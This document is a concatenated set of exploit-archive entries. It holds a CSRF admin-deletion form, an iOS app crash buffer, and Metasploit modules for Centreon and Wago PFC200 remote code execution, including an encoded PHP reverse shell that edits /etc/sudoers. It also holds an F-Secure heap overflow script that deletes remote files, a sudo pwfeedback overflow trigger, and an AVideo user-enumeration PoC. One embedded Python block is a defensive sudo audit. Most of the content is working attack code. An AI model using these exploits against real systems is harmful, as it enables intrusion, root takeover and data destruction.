      <input type="hidden" name="18&#95;1" value="18&#95;1" />
      <input type="hidden" name="18&#95;2" value="18&#95;2" />
      <input type="hidden" name="18&#95;3" value="18&#95;3" />
      <input type="hidden" name="18&#95;4" value="18&#95;4" />
      <input type="hidden" name="18&#95;6" value="18&#95;6" />
      <input type="hidden" name="18&#95;7" value="18&#95;7" />
      <input type="hidden" name="18&#95;8" value="18&#95;8" />
      <input type="hidden" name="18&#95;9" value="18&#95;9" />
      <input type="hidden" name="18&#95;10" value="18&#95;10" />
      <input type="hidden" name="18&#95;11" value="18&#95;11" />
      <input type="hidden" name="18&#95;12" value="18&#95;12" />
      <input type="hidden" name="19&#95;p" value="19&#95;p" />
      <input type="hidden" name="19&#95;1" value="19&#95;1" />
      <input type="hidden" name="19&#95;2" value="19&#95;2" />
      <input type="hidden" name="19&#95;3" value="19&#95;3" />
      <input type="hidden" name="19&#95;4" value="19&#95;4" />
      <input type="hidden" name="19&#95;5" value="19&#95;5" />
      <input type="hidden" name="19&#95;6" value="19&#95;6" />
      <input type="hidden" name="19&#95;11" value="19&#95;11" />
      <input type="hidden" name="19&#95;7" value="19&#95;7" />
      <input type="hidden" name="19&#95;12" value="19&#95;12" />
      <input type="hidden" name="19&#95;13" value="19&#95;13" />
      <input type="hidden" name="19&#95;14" value="19&#95;14" />
      <input type="hidden" name="19&#95;15" value="19&#95;15" />
      <input type="hidden" name="19&#95;101" value="19&#95;101" />
      <input type="hidden" name="19&#95;102" value="19&#95;102" />
      <input type="hidden" name="19&#95;8" value="19&#95;8" />
      <input type="hidden" name="19&#95;16" value="19&#95;16" />
      <input type="hidden" name="19&#95;9" value="19&#95;9" />
      <input type="hidden" name="19&#95;10" value="19&#95;10" />
      <input type="hidden" name="19&#95;17" value="19&#95;17" />
      <input type="hidden" name="19&#95;18" value="19&#95;18" />
      <input type="hidden" name="20&#95;p" value="20&#95;p" />
      <input type="hidden" name="20&#95;1" value="20&#95;1" />
      <input type="hidden" name="20&#95;5" value="20&#95;5" />
      <input type="hidden" name="20&#95;101" value="20&#95;101" />
      <input type="hidden" name="20&#95;2" value="20&#95;2" />
      <input type="hidden" name="20&#95;6" value="20&#95;6" />
      <input type="hidden" name="20&#95;102" value="20&#95;102" />
      <input type="hidden" name="20&#95;3" value="20&#95;3" />
      <input type="hidden" name="20&#95;4" value="20&#95;4" />
      <input type="hidden" name="21&#95;p" value="21&#95;p" />
      <input type="hidden" name="21&#95;1" value="21&#95;1" />
      <input type="hidden" name="21&#95;2" value="21&#95;2" />
      <input type="hidden" name="21&#95;3" value="21&#95;3" />
      <input type="hidden" name="22&#95;p" value="22&#95;p" />
      <input type="hidden" name="22&#95;1" value="22&#95;1" />
      <input type="hidden" name="22&#95;2" value="22&#95;2" />
      <input type="hidden" name="22&#95;3" value="22&#95;3" />
      <input type="hidden" name="22&#95;5" value="22&#95;5" />
      <input type="hidden" name="22&#95;4" value="22&#95;4" />
      <input type="hidden" name="22&#95;6" value="22&#95;6" />
      <input type="hidden" name="23&#95;p" value="23&#95;p" />
      <input type="hidden" name="24&#95;p" value="24&#95;p" />
      <input type="hidden" name="24&#95;1" value="24&#95;1" />
      <input type="hidden" name="24&#95;2" value="24&#95;2" />
      <input type="hidden" name="24&#95;3" value="24&#95;3" />
      <input type="hidden" name="24&#95;4" value="24&#95;4" />
      <input type="hidden" name="25&#95;p" value="25&#95;p" />
      <input type="hidden" name="25&#95;1" value="25&#95;1" />
      <input type="hidden" name="25&#95;2" value="25&#95;2" />
      <input type="hidden" name="25&#95;5" value="25&#95;5" />
      <input type="hidden" name="25&#95;6" value="25&#95;6" />
      <input type="hidden" name="25&#95;3" value="25&#95;3" />
      <input type="hidden" name="25&#95;4" value="25&#95;4" />
      <input type="hidden" name="25&#95;7" value="25&#95;7" />
      <input type="hidden" name="25&#95;8" value="25&#95;8" />
      <input type="hidden" name="26&#95;p" value="26&#95;p" />
      <input type="hidden" name="26&#95;1" value="26&#95;1" />
      <input type="hidden" name="26&#95;2" value="26&#95;2" />
      <input type="hidden" name="27&#95;p" value="27&#95;p" />
      <input type="hidden" name="27&#95;1" value="27&#95;1" />
      <input type="hidden" name="27&#95;2" value="27&#95;2" />
      <input type="hidden" name="27&#95;3" value="27&#95;3" />
      <input type="hidden" name="28&#95;p" value="28&#95;p" />
      <input type="hidden" name="28&#95;1" value="28&#95;1" />
      <input type="hidden" name="28&#95;2" value="28&#95;2" />
      <input type="hidden" name="28&#95;3" value="28&#95;3" />
      <input type="hidden" name="28&#95;4" value="28&#95;4" />
      <input type="hidden" name="28&#95;5" value="28&#95;5" />
      <input type="hidden" name="29&#95;p" value="29&#95;p" />
      <input type="hidden" name="29&#95;1" value="29&#95;1" />
      <input type="hidden" name="29&#95;2" value="29&#95;2" />
      <input type="hidden" name="30&#95;p" value="30&#95;p" />
      <input type="hidden" name="30&#95;1" value="30&#95;1" />
      <input type="hidden" name="30&#95;2" value="30&#95;2" />
      <input type="hidden" name="30&#95;3" value="30&#95;3" />
      <input type="hidden" name="30&#95;4" value="30&#95;4" />
      <input type="hidden" name="30&#95;5" value="30&#95;5" />
      <input type="hidden" name="30&#95;6" value="30&#95;6" />
      <input type="hidden" name="30&#95;7" value="30&#95;7" />
      <input type="hidden" name="30&#95;8" value="30&#95;8" />
      <input type="hidden" name="31&#95;p" value="31&#95;p" />
      <input type="hidden" name="31&#95;1" value="31&#95;1" />
      <input type="hidden" name="31&#95;2" value="31&#95;2" />
      <input type="hidden" name="31&#95;3" value="31&#95;3" />
      <input type="hidden" name="31&#95;5" value="31&#95;5" />
      <input type="hidden" name="31&#95;4" value="31&#95;4" />
      <input type="hidden" name="32&#95;p" value="32&#95;p" />
      <input type="hidden" name="32&#95;3" value="32&#95;3" />
      <input type="hidden" name="32&#95;1" value="32&#95;1" />
      <input type="hidden" name="32&#95;4" value="32&#95;4" />
      <input type="hidden" name="32&#95;2" value="32&#95;2" />
      <input type="hidden" name="32&#95;5" value="32&#95;5" />
      <input type="hidden" name="33&#95;p" value="33&#95;p" />
      <input type="hidden" name="33&#95;1" value="33&#95;1" />
      <input type="hidden" name="33&#95;2" value="33&#95;2" />
      <input type="hidden" name="33&#95;3" value="33&#95;3" />
      <input type="hidden" name="33&#95;8" value="33&#95;8" />
      <input type="hidden" name="33&#95;4" value="33&#95;4" />
      <input type="hidden" name="33&#95;5" value="33&#95;5" />
      <input type="hidden" name="33&#95;6" value="33&#95;6" />
      <input type="hidden" name="33&#95;7" value="33&#95;7" />
      <input type="hidden" name="34&#95;p" value="34&#95;p" />
      <input type="hidden" name="34&#95;1" value="34&#95;1" />
      <input type="hidden" name="34&#95;2" value="34&#95;2" />
      <input type="hidden" name="35&#95;p" value="35&#95;p" />
      <input type="hidden" name="35&#95;1" value="35&#95;1" />
      <input type="hidden" name="35&#95;2" value="35&#95;2" />
      <input type="hidden" name="35&#95;3" value="35&#95;3" />
      <input type="hidden" name="saveallowance" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Proof of Concept for the arbitrary user deletion:
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://SITEHERE/office_admin/">
      <input type="hidden" name="pid" value="42" />
      <input type="hidden" name="action" value="deleteadmin" />
      <input type="hidden" name="lid" value="90" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            
# Exploit Title: P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2020-02-02
# Vendor Homepage: https://apps.apple.com/mx/app/p2pwificam2/id663665207
# Software Link: App Store for iOS devices
# Tested Version: 10.4.1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s iOS 13.3

# Summary: P2PWIFICAM is P2P (point-to-point) monitoring software for matching network cameras.
# It adopts advanced P2P technology, which frees cameras on the intranet from complex port mapping:
# truly plug and play!

# Steps to Produce the Crash:

# 1.- Run python code: P2PWIFICAM.py
# 2.- Copy content to clipboard
# 3.- Open "P2PWIFICAM" for iOS
# 4.- Go to "Add" (Touch here to add a camera)
# 5.- Go to "Input Camera"
# 6.- Paste Clipboard on "Camera ID" 
# 7.- Paste Clipboard on "Password" 
# 9.- Ok
# 10- Crashed

#!/usr/bin/env python

buffer = "\x41" * 257
print (buffer)
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Centreon Poller Authenticated Remote Command Execution',
      'Description' => %q{
        TODO
      },
      'Author' => [
        'Omri Baso', # discovery
        'Fabien Aunay', # discovery
        'mekhalleh (RAMELLA Sébastien)' # this module
      ],
      'References' => [
        # TODO: waiting for CVE
        ['EDB', '47977']
      ],
      'DisclosureDate' => '2020-01-27',
      'License' => MSF_LICENSE,
      'Platform' => ['linux', 'unix'],
      'Arch' => [ARCH_CMD, ARCH_X64],
      'Privileged' => true,
      'Targets' => [
        ['Reverse shell (In-Memory)',
          'Platform' => 'unix',
          'Type' => :cmd_unix,
          'Arch' => ARCH_CMD,
          'DefaultOptions' => {
            'PAYLOAD' => 'cmd/unix/reverse_bash'
          }
        ],
        ['Meterpreter (Dropper)',
          'Platform' => 'linux',
          'Type' => :meterpreter,
          'Arch' => ARCH_X64,
          'DefaultOptions' => {
            'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
            'CMDSTAGER::FLAVOR' => 'curl' # illegal characters: `~$^&"|'<>
          }
        ]
      ],
      'DefaultTarget' => 0,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      OptString.new('PASSWORD', [true, 'The Centreon Web panel password to authenticate with']),
      OptString.new('TARGETURI', [true, 'The URI of the Centreon Web panel path', '/centreon']),
      OptString.new('USERNAME', [true, 'The Centreon Web panel username to authenticate with'])
    ])
  end

  def create_new_poller(poller_name, command_id)
    print_status("Create new poller entry on the target.")
    token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60901'})
    return false unless token

    response = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'main.get.php?p=60901'),
      'cookie' => @cookies,
      'partial' => true,
      'vars_post'   => {
        'name' => poller_name,
        'ns_ip_address' => '127.0.0.1',
        'localhost[localhost]' => '1',
        'is_default[is_default]' => '0',
        'remote_id' => '',
        'ssh_port' => '22',
        'remote_server_centcore_ssh_proxy[remote_server_centcore_ssh_proxy]' => '1',
        'engine_start_command' => 'service centengine start',
        'engine_stop_command' => 'service centengine stop',
        'engine_restart_command' => 'service centengine restart',
        'engine_reload_command' => 'service centengine reload',
        'nagios_bin' => '/usr/sbin/centengine',
        'nagiostats_bin' => '/usr/sbin/centenginestats',
        'nagios_perfdata' => '/var/log/centreon-engine/service-perfdata',
        'broker_reload_command' => 'service cbd reload',
        'centreonbroker_cfg_path' => '/etc/centreon-broker',
        'centreonbroker_module_path' => '/usr/share/centreon/lib/centreon-broker',
        'centreonbroker_logs_path' => '/var/log/centreon-broker',
        'centreonconnector_path' => '',
        'init_script_centreontrapd' => 'centreontrapd',
        'snmp_trapd_path_conf' => '/etc/snmp/centreon_traps/',
        'pollercmd[0]' => command_id,
        'clone_order_pollercmd_0' => '',
        'ns_activate[ns_activate]' => '1',
        'submitA' => 'Save',
        'id' => '',
        'o' => 'a',
        'centreon_token' => token
      }
    )
    return false unless response

    return true
  end

  def execute_command(command, opts = {})
    cmd_name = rand_text_alpha(8..42)
    poller_name = rand_text_alpha(8..42)

    ## Register a miscellaneous command.
    print_status("Upload command payload on the target.")
    token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60803', 'type' => '3'})
    return false unless token

    response = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'main.get.php?p=60803&type=3'),
      'cookie' => @cookies,
      'partial' => true,
      'vars_post'   => {
        'command_name' => cmd_name,
        'command_type[command_type]' => '3',
        'command_line' => command,
        'resource' => '$CENTREONPLUGINS$',
        'plugins' => '/Centreon/SNMP',
        'macros' => '$ADMINEMAIL$',
        'command_example' => '',
        'listOfArg' => '',
        'listOfMacros' => '',
        'connectors' => '',
        'graph_id' => '',
        'command_activate[command_activate]' => '1',
        'command_comment' => '',
        'submitA' => 'Save',
        'command_id' => '',
        'type' => '3',
        'o' => 'a',
        'centreon_token' => token
      }
    )
    return false unless response

    ## Create new poller to serve the payload.
    create_new_poller(poller_name, get_command_id(cmd_name))
    poller_id = get_poller_id(poller_name)

    ## Export configuration to reload to trigger the exploit.
    unless poller_id.nil?
      restart_exportation(poller_id)
    end
  end

  def get_auth
    print_status("Send authentication request.")
    token = get_token(normalize_uri(target_uri.path, 'index.php'))
    unless token.nil?
      response = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'cookie' => @cookies,
        'vars_post'  => {
          'useralias' => datastore['USERNAME'],
          'password' => datastore['PASSWORD'],
          'submitLogin' => 'Connect',
          'centreon_token' => token
        }
      )
      return false unless response

      if response.redirect?
        if response.headers['location'].include?('main.php')
          print_status('Successfully authenticated.')
          @cookies = response.get_cookies
          return true
        end
      end
    end

    print_bad('Your credentials are incorrect.')
    return false
  end

  def get_command_id(cmd_name)
    response = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'main.get.php'),
      'cookie' => @cookies,
      'vars_get' => {
          'p' => '60803',
          'type' => '3'
      }
    )
    return nil unless response

    href = response.get_html_document.at("//a[contains(text(), \"#{cmd_name}\")]")['href']
    return nil unless href

    id = href.split('?')[1].split('&')[2].split('=')[1]
    return id unless id.empty?

    return nil
  end

  def get_poller_id(poller_name)
    response = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'main.get.php'),
      'cookie' => @cookies,
      'vars_get' => {'p' => '60901'}
    )
    return nil unless response

    href = response.get_html_document.at("//a[contains(text(), \"#{poller_name}\")]")['href']
    return nil unless href

    id = href.split('?')[1].split('&')[2].split('=')[1]
    return id unless id.empty?

    return nil
  end

  def get_session
    response = send_request_cgi(
      'method' => 'HEAD',
      'uri' => normalize_uri(target_uri.path, 'index.php')
    )
    cookies = response.get_cookies
    return cookies unless cookies.empty?
  end

  def get_token(uri, params = {})
    ## Get centreon_token value.
    request = {
      'method' => 'GET',
      'uri' => uri,
      'cookie' => @cookies
    }
    request = request.merge({'vars_get' => params}) unless params.empty?
    response = send_request_cgi(request)

    return nil unless response
    return response.get_html_document.at('input[@name="centreon_token"]')['value']
  end

  def restart_exportation(poller_id)
    print_status("Reload the poller to trigger exploitation.")
    token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60902', 'poller' => poller_id})

    vprint_status(' -- Generating files.')
    unless token.nil?
      response = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'generateFiles.php'),
        'cookie' => @cookies,
        'vars_post' => {
          'poller' => poller_id,
          'debug' => 'true',
          'generate' => 'true'
        }
      )
      return nil unless response

      vprint_status(' -- Restarting engine.')
      response = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'restartPollers.php'),
        'cookie' => @cookies,
        'vars_post' => {
          'poller' => poller_id,
          'mode' => '2'
        }
      )
      return nil unless response

      vprint_status(' -- Executing command.')
      response = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'postcommand.php'),
        'cookie' => @cookies,
        'vars_post' => {'poller' => poller_id}
      )
      return nil unless response
    end
  end

  def check
    # TODO: Detection by version number (waiting to know the impacted versions).
  end

  def exploit
    ## TODO: check

    @cookies = get_session
    logged = get_auth unless @cookies.empty?
    if logged
      case target['Type']
      when :cmd_unix
        execute_command(payload.encoded)
      when :meterpreter
        execute_command(generate_cmdstager.join)
      end
    end
  end

end
            
# Title: F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)
# Date: 2020-01-30
# Author: Kevin Joensen
# Vendor: F-Secure
# Software: https://www.f-secure.com/en/business/downloads/internet-gatekeeper
# CVE: N/A
# Reference: https://blog.doyensec.com/2020/02/03/heap-exploit.html

from pwn import *
import time
import sys



def send_payload(payload, content_len=21487483844, nofun=False):
    r = remote(sys.argv[1], 9012)
    r.send("POST / HTTP/1.1\n")
    r.send("Host: 192.168.0.122:9012\n")
    r.send("Content-Length: {}\n".format(content_len))
    r.send("\n")
    r.send(payload)
    if not nofun:
        r.send("\n\n")
    return r


def trigger_exploit():
    print "Triggering exploit"
    payload = ""
    payload += "A" * 12             # Padding
    payload += p32(0x1d)            # Fast bin chunk overwrite
    payload += "A"* 488             # Padding
    payload += p32(0xdda00771)      # Address of payload
    payload += p32(0xdda00771+4)    # Junk
    r = send_payload(payload)



def massage_heap(filename):
        print "Trying to massage the heap....."
        for x in xrange(100):
            payload = ""
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0xdda0077d)      # Points to where the filename will be in memory
            payload += filename + "\x00"
            payload += "C"*(0x300-len(payload))
            r = send_payload(payload, content_len=0x80000, nofun=True)
            r.close()
            cut_conn = True
        print "Heap massage done"


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
        print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
        exit()
    massage_heap(sys.argv[2])
    time.sleep(1)
    trigger_exploit()
    print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])
            
# Title: Sudo 1.8.25p - Buffer Overflow
# Date: 2020-01-30
# Author: Joe Vennix
# Software: Sudo
# Versions: Sudo versions prior to 1.8.26
# CVE: CVE-2019-18634
# Reference: https://www.sudo.ws/alerts/pwfeedback.html

# Sudo's pwfeedback option can be used to provide visual feedback when the user is inputting 
# their password. For each key press, an asterisk is printed. This option was added in 
# response to user confusion over how the standard Password: prompt disables the echoing 
# of key presses. While pwfeedback is not enabled by default in the upstream version of sudo,
# some systems, such as Linux Mint and Elementary OS, do enable it in their default sudoers files.

# Due to a bug, when the pwfeedback option is enabled in the sudoers file, a user may be able to trigger a stack-based buffer overflow.
# This bug can be triggered even by users not listed in the sudoers file. There is no impact unless pwfeedback has been enabled.

The following sudoers configuration is vulnerable:

    $ sudo -l
    Matching Defaults entries for millert on linux-build:
	insults, pwfeedback, mail_badpass, mailerpath=/usr/sbin/sendmail

    User millert may run the following commands on linux-build:
	(ALL : ALL) ALL

# Exploiting the bug does not require sudo permissions, merely that pwfeedback be enabled. 
# The bug can be reproduced by passing a large input to sudo via a pipe when it prompts for a password.

    $ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
    Password: Segmentation fault

If pwfeedback is enabled in sudoers, the stack overflow may allow unprivileged users to escalate to the root account.
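
The two conditions described above (an affected sudo version and pwfeedback switched on) can be checked on a host before an attacker does. The following audit sketch is an added example, not part of the original advisory; its function names and the sudoers sample are constructed for illustration, and it reads both the `sudo -l` format quoted above and raw sudoers text.

```python
import re

# Per the advisory header above: sudo versions prior to 1.8.26 are affected.
FIXED_VERSION = (1, 8, 26)

# Constructed sudoers sample, modelled on the `sudo -l` output quoted above.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults   insults, pwfeedback, mail_badpass, \\
           mailerpath=/usr/sbin/sendmail
Defaults:backup !pwfeedback   # scoped override; the global flag stays on
millert ALL=(ALL : ALL) ALL
"""

# The `sudo -l` output quoted above, embedded so the block runs offline.
SAMPLE_SUDO_L = (
    "Matching Defaults entries for millert on linux-build:\n"
    "\tinsults, pwfeedback, mail_badpass, mailerpath=/usr/sbin/sendmail\n"
    "\n"
    "User millert may run the following commands on linux-build:\n"
    "\t(ALL : ALL) ALL\n"
)


def parse_version(text):
    """Extract (major, minor, patch) from e.g. 'Sudo version 1.8.25p1'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(g) for g in m.groups()) if m else None


def split_options(spec):
    """Split on unquoted commas; stop at an unquoted '#' (start of a comment)."""
    parts, cur, quoted = [], [], False
    for ch in spec:
        if ch == '"':
            quoted = not quoted
        if not quoted and ch == "#":
            break
        if not quoted and ch == ",":
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return [p.strip() for p in parts if p.strip()]


def flag_state(option):
    """True/False when `option` sets pwfeedback (odd count of '!' negates), else None."""
    m = re.fullmatch(r"(!*)\s*pwfeedback", option)
    return None if m is None else len(m.group(1)) % 2 == 0


def pwfeedback_by_scope(sudoers_text):
    """Map each Defaults scope ('' is global, ':user', '@host', ...) to its final
    pwfeedback setting; later entries override earlier ones. Included files
    (#include / #includedir) are not followed and must be audited separately."""
    state = {}
    folded = re.sub(r"\\\r?\n", " ", sudoers_text)  # join continuation lines
    for raw in folded.splitlines():
        m = re.match(r"Defaults(\S*)\s+(.*)$", raw.strip())
        if not m:
            continue
        scope, spec = m.groups()
        for option in split_options(spec):
            setting = flag_state(option)
            if setting is not None:
                state[scope] = setting
    return state


def pwfeedback_in_sudo_l(output):
    """Read the 'Matching Defaults entries' block of `sudo -l` output."""
    enabled, in_block = False, False
    for line in output.splitlines():
        if line.strip().startswith("Matching Defaults entries"):
            in_block = True
        elif in_block and not line.strip():
            break
        elif in_block:
            for option in split_options(line):
                setting = flag_state(option)
                if setting is not None:
                    enabled = setting
    return enabled


def audit(version_text, sudoers_text):
    """Combine both conditions from the advisory: affected version AND pwfeedback on."""
    version = parse_version(version_text)
    scopes = pwfeedback_by_scope(sudoers_text)
    enabled = sorted(s or "(global)" for s, on in scopes.items() if on)
    # An unparseable version is treated as affected so it gets a manual look.
    affected = version is None or version < FIXED_VERSION
    return {"version": version, "version_affected": affected,
            "pwfeedback_scopes": enabled, "exposed": affected and bool(enabled)}


if __name__ == "__main__":
    print(audit("Sudo version 1.8.25p1", SAMPLE_SUDOERS))
```

On a real host, pass the first line of `sudo -V` and the sudoers text; a later `Defaults !pwfeedback` entry turns the option off and clears the finding even before the package is upgraded.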
            
# Exploit Title: AVideo Platform 8.1 - Information Disclosure (User Enumeration)
# Dork: N/A
# Date: 2020-02-05
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://avideo.com
# Software Link: https://github.com/WWBN/AVideo
# Version: 8.1
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]
# 
................
0	
id	92
user	"admin"
name	"Watch Later"
email	"user@localhost"
password	"bc79a173cc20f0897db1c5b004588db9"
created	"2019-05-16 21:42:42"
modified	"2019-05-16 21:42:42"
isAdmin	1
status	"watch_later"
photoURL	"videos/userPhoto/photo1.png"
lastLogin	"2020-02-03 08:11:08"
recoverPass	"0ce70c7b006c78552fee993adeaafadf"
................
# 
# Hash function to be converted ....
# 
function encryptPassword($password, $noSalt = false) {
    global $advancedCustom, $global, $advancedCustomUser;
    if (!empty($advancedCustomUser->encryptPasswordsWithSalt) && !empty($global['salt']) && empty($noSalt)) {
        $password .= $global['salt'];
    }

    return md5(hash("whirlpool", sha1($password)));
}
#
            
# Exploit Title: Wago PFC200 - Authenticated Remote Code Execution (Metasploit)
# Date: 2020-02-05
# Exploit Author: Nico Jansen (0x483d)
# Vendor Homepage: https://www.wago.com/
# Version: <= Firmware 11 (02_08_35)
# Tested on: Linux
# CVE : N/A

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'json'

class MetasploitModule < Msf::Exploit::Remote
  #Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Wago PFC200 authenticated remote code execution',
      'Description' => %q{
        The Wago PFC200 (up to incl. Firmware 11 02_08_35) is vulnerable to an authenticated remote code execution in the
        administrative web interface. By exploiting the vulnerability, an attacker is able to run system commands in root context.
        To execute this module, login credentials of the website administrator are required (default: admin/wago).
        This module was tested against a Wago 750-8202 Firmware 11 (02_08_35) but other PFC200 models may be affected as well.
      },
      'Author' =>
        [
          'Nico Jansen (0x483d)' # Vulnerability discovery and MSF module
        ],
      'License' => MSF_LICENSE,
      'Platform' => 'php',
      'References' =>
        [
          ['CVE', '-'],
          ['US-CERT-VU', '-'],
          ['URL', '-'],
          ['URL', '-']
        ],
      'DisclosureDate' => 'Aug 1 2018',
      'Privileged' => true,
      'DefaultOptions' => {
        'PAYLOAD' => 'php/meterpreter/reverse_tcp',
        'SSL' => true,
      },
      'Targets' => [
        ['Automatic', {}]
      ],
      'DefaultTarget'   => 0))

      register_options(
        [
          Opt::RPORT(443),
          OptString.new('ADMINPASSWORD', [true, 'Password to authenticate as admin', 'wago']),
        ])

        deregister_options('VHOST')
  end

  # This function checks the index page to check if it may be a valid device.
  # There are some more checks done after a successful authentication
  def check
    @csrf=""
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/wbm/index.php'
    )

    if res && res.code == 200 && res.body.to_s =~ /WAGO Ethernet Web-based Management/
      result = sendConfigToolMessage("get_typelabel_value", ["SYSDESC"])
      if result and result =~ /PFC200/
        # Get Version and check if it's <= 11
        result = sendConfigToolMessage("get_coupler_details", ["firmware-revision"])
        result = result.split('(')[1]
        result = result.split(')')[0]
        if Integer(result) <= 11
          return Exploit::CheckCode::Vulnerable
        else
          return Exploit::CheckCode::Safe
        end
      end
      return Exploit::CheckCode::Safe
    end
    return Exploit::CheckCode::Safe
  end

  # This function authenticates the adminuser against the Wago PLC
  def login
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => '/wbm/login.php',
      'data' => '{"username":"admin","password":"' + datastore['ADMINPASSWORD'] + '"}'
    )
    if res.code != 200
      return false
    end

    parsed_json = JSON.parse(res.body.to_s)
    if parsed_json["status"] == 0
      @cookie = res.get_cookies
      @csrf = parsed_json["csrfToken"]
      return true
    else
      return false
    end
  end

  # This function can be used to execute arbitrary commands after login
  def sendConfigToolMessage(scriptname, parameters, expectResponse=true)
    parameterString = ''
    for param in parameters
      parameterString = parameterString + '"' + param + '", '
    end

    parameterString = parameterString[0...-2]
    request ='{"csrfToken":"' + @csrf + '",'\
      '"renewSession":true,"aDeviceParams":{"0"'\
      ':{"name":"' + scriptname + '","parameter":['\
      + parameterString + '],"sudo":true,"multiline":false,'\
      '"timeout":12000,"dataId":0}}}'

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => '/wbm/configtools.php',
      'data' => request,
      'cookie' => @cookie,
    )
    # After exploitation, there is no response, so just return true because the message was sent
    if expectResponse == false
      return true
    end

    parsed_json = JSON.parse(res.body.to_s)
    @csrf = parsed_json["csrfToken"]
    if parsed_json["aDeviceResponse"][0]["status"] == 0
      return parsed_json["aDeviceResponse"][0]["resultString"]
    else
      return false
    end
  end

  # This function is used to enable php execution in sudoers file using sed
  def change_sudo_permissions()
    return sendConfigToolMessage('/../../../usr/bin/sed',["-i", "s/NOPASSWD:/NOPASSWD:ALL#/", "/etc/sudoers"])
  end

  # Encode a given string to bypass validation
  def encode(content)
    result = ""
    content.split("").each do |i|
      result = result + "chr(" + (i.ord).to_s + ")."
    end
    result = result[0...-1]
    return result
  end

  # This function generates the required payload used to connect to the msf listener
  def send_payload()
    meterpreter_reverse_php='exec("/usr/bin/sed -i \'s/NOPASSWD:ALL#/NOPASSWD:/\' \'/etc/sudoers\'"); $ip = "' + datastore['LHOST'] + '"; $port = ' + datastore['LPORT'].to_s + '; '\
    'if (($f = "stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); '\
    '$s_type = "stream"; } if (!$s && ($f = "fsockopen") && is_callable($f)) { $s = $f($ip, $port);'\
    ' $s_type = "stream"; } if (!$s && ($f = "socket_create") && is_callable($f)) '\
    '{ $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) '\
    '{ die(); } $s_type = "socket"; } if (!$s_type) { die("no socket funcs"); } '\
    'if (!$s) { die("no socket"); } switch ($s_type) { case "stream": $len = fread($s, 4); break; '\
    'case "socket": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len);'\
    ' $len = $a["len"]; $b = ""; while (strlen($b) < $len) { switch ($s_type) { case "stream": $b .= '\
    'fread($s, $len-strlen($b)); break; case "socket": $b .= socket_read($s, $len-strlen($b)); break; } } '\
    '$GLOBALS["msgsock"] = $s; $GLOBALS["msgsock_type"] = $s_type; if (extension_loaded("suhosin") '\
    '&& ini_get("suhosin.executor.disable_eval")) { $suhosin_bypass=create_function("", $b); $suhosin_bypass(); } '\
    'else { eval($b); } die(); ?>'

    command = "eval(" + encode(meterpreter_reverse_php) + ");"
    return sendConfigToolMessage("/../../../usr/bin/php5", ["-r", command], false)
  end

  def exploit
    if check == Exploit::CheckCode::Vulnerable # Check if the system may be a PFC200
      print_good("Target seems to be a vulnerable PFC200 device")
      if login # Try to authenticate using the given credentials
        print_good("Successfully logged in as website admin")
        if change_sudo_permissions()
          print_good("Manipulated the /etc/sudoers file to enable php execution as root")
          print_good("Preparing meterpreter payload and undoing changes to /etc/sudoers...")
          send_payload()
        else
          print_error("Unable to modify the /etc/sudoers file...")
        end
      else
        print_error("Unable to login as admin with the given credentials...")
      end
    else
      print_error("Target is not a valid PFC200 device. Will exit now...")
    end
  end
end
            
